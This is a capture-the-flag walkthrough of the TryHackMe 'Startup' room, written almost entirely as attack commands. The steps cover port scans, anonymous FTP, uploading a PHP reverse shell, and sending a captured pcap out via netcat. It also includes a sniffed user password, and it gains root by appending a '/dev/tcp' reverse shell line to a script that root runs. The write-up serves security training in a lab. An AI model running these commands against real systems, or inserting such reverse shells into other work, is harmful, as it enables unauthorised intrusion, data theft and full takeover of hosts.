Startup

Room Link: https://tryhackme.com/room/startup

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/21 - FTP

Anonymous login is enabled

Kali

ftp $VICTIM
binary
passive
mget *

TCP/80 - HTTP

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

TCP/21 - FTP

Kali

git clone https://github.com/pentestmonkey/php-reverse-shell.git
cp php-reverse-shell/php-reverse-shell.php .
subl php-reverse-shell.php 

Kali

ftp $VICTIM
binary
passive
cd ftp
put php-reverse-shell.php 

Kali

nc -lvnp 1337

Get autocomplete

python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Netcat

Kali(receiving)

nc -l -p 1234 > suspicious.pcapng

Victim(sending)

nc -w 3 $KALI 1234 < suspicious.pcapng

Wireshark

Followed the TCP stream and just kept changing it until something came up. Eventually we find lennies password.

Kali

wireshark &

TCP/22 - SSH

Kali

ssh lennie@$VICTIM
Password: c4ntg3t3n0ughsp1c3

Privilege Escalation

There is a script in lennies directory that is owned by root. We can't make any changes to that script but it calls another script which we do have access to so I add a reverse shell and wait for it to be called.

Kali

nc -lvnp 1338

Victim

echo 'sh -i >& /dev/tcp/10.10.195.128/1338 0>&1' >> /etc/print.sh